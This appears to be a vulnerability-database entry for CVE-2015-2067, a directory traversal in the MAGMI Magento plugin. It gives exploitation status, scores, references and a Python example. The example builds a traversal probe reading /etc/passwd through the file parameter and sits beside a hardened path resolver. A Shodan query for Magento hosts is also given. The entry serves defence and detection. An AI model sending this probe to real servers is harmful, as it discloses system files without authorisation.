CVE-2015-2067

Tags: EXPLOITED · NUCLEI

MAGMI - Path Traversal via File Parameter

Title source: llm

Exploitation Summary

CVE-2015-2067 has been observed exploited in the wild (reported by VulnCheck KEV). EIP tracks 1 public exploit, authored by SECUPENT. A Nuclei detection template is also available.

AI-analyzed exploit summary: The exploit demonstrates a path-traversal file read (described in the exploit as a Local File Inclusion, LFI) and a Cross-Site Scripting (XSS) issue in the Magento Server MAGMI plugin. The traversal reads arbitrary files through the file parameter of web/ajax_pluginconf.php; the XSS is achieved through improper sanitization of URL parameters. Only the traversal is covered by CVE-2015-2067; the XSS is part of the exploit-db write-up, not of this CVE's scope.

Description

Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
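As an added illustration (not MAGMI's code and not the exploit-db PoC), the following Python shows both sides of the CWE-22 issue the description above frames: a detection check of the kind the Nuclei template performs, which builds the traversal probe against web/ajax_pluginconf.php and matches a /etc/passwd signature in the response, and a confined path resolver that shows how the file parameter should have been handled server-side. Only the script path, the file parameter and the `..` sequence come from the CVE description; the traversal depth, the passwd signature regex, the sample responses and the plugin directory path are assumptions constructed for the example, and any further query parameters the real endpoint might require are not listed on this page and must be supplied by the caller.

```python
"""Added example for CVE-2015-2067 (MAGMI web/ajax_pluginconf.php, CWE-22).

Not MAGMI's code and not the exploit-db PoC. It shows (a) how a traversal
probe and its response match are built for detection, and (b) a confined
path resolver that neutralises the `..` traversal. Runs offline on
constructed sample data.
"""
import os
import re
from urllib.parse import urlencode, urljoin

# Script path and parameter name come from the CVE description; the
# traversal depth is an assumption (enough to reach / on typical installs).
VULN_PATH = "magmi/web/ajax_pluginconf.php"
TRAVERSAL = "../" * 10 + "etc/passwd"

# Assumed signature for a UNIX passwd file: the root account line.
PASSWD_SIG = re.compile(r"^root:[^:]*:0:0:", re.MULTILINE)

# Constructed sample response bodies (not captured from a real host).
SAMPLE_LEAK = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)
SAMPLE_CLEAN = "<html><body>plugin configuration</body></html>"


def build_probe_url(base_url, extra_params=None):
    """Return the traversal probe URL for a Magento base URL.

    extra_params: any further query parameters the endpoint may need
    (assumption: not documented on this page, so left to the caller).
    """
    params = {"file": TRAVERSAL}
    if extra_params:
        params.update(extra_params)
    endpoint = urljoin(base_url.rstrip("/") + "/", VULN_PATH)
    # safe="/" keeps the traversal readable instead of encoding it as %2F
    return endpoint + "?" + urlencode(params, safe="/")


def is_vulnerable(status_code, body):
    """Decide from an HTTP response whether the probe disclosed /etc/passwd."""
    return status_code == 200 and PASSWD_SIG.search(body) is not None


def resolve_plugin_file(plugin_dir, requested):
    """Hardened counterpart: confine `file` to plugin_dir or refuse.

    Joining, canonicalising and then checking the common prefix defeats
    `..` segments, absolute paths and symlink escapes alike.
    """
    base = os.path.realpath(plugin_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes plugin directory: %r" % requested)
    return target


def is_confined(plugin_dir, requested):
    """True if `requested` resolves inside plugin_dir, False if it escapes."""
    try:
        resolve_plugin_file(plugin_dir, requested)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    # Assumed base URL and plugin directory, for demonstration only.
    print(build_probe_url("https://shop.example"))
    print("leak detected:", is_vulnerable(200, SAMPLE_LEAK))
    print("clean page:   ", is_vulnerable(200, SAMPLE_CLEAN))
    for req in ("utilities/customsql.php", TRAVERSAL, "/etc/passwd"):
        verdict = "allowed" if is_confined("/srv/magmi/plugins", req) else "refused"
        print("%-40s -> %s" % (req, verdict))
```

The detection half deliberately requires both a 200 status and the root-account signature, so an error page that merely echoes the requested path does not count as a hit. The resolver half canonicalises before comparing, which is the check the vulnerable endpoint lacked: a prefix test on the raw string would still let `..` through.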

Exploits (1)

exploitdb · WORKING POC
by SECUPENT · text · webapps · php
https://www.exploit-db.com/exploits/35996


Classification
Working PoC (90% confidence)
Attack Type: Info Leak | XSS
Complexity: Trivial
Reliability: Reliable
Target: MAGMI Plugin for Magento
Authentication: none needed
Prerequisites: Access to the MAGMI web interface
Analyzed by devstral-2 on Feb 16, 2026

Nuclei Templates (1)

Magento Server MAGMI - Directory Traversal
Severity: MEDIUM · by daffainfo
Shodan: http.component:"Magento" || http.component:"magento"

References (3)

Core References (3)
http://www.exploit-db.com/exploits/35996 (Exploit, Third Party Advisory, VDB Entry; x_refsource_exploit-db)
http://www.securityfocus.com/bid/74881 (Third Party Advisory, VDB Entry; x_refsource_bid)

Scores

EPSS: 0.7638 (99.0th percentile)

Details

VulnCheck KEV: 2020-11-22
CWE: CWE-22 (Path Traversal)
Status: published
Products (2)
dweeves/magmi (Packagist)
magmi_project/magmi
Published: Feb 24, 2015
Tracked Since: Feb 18, 2026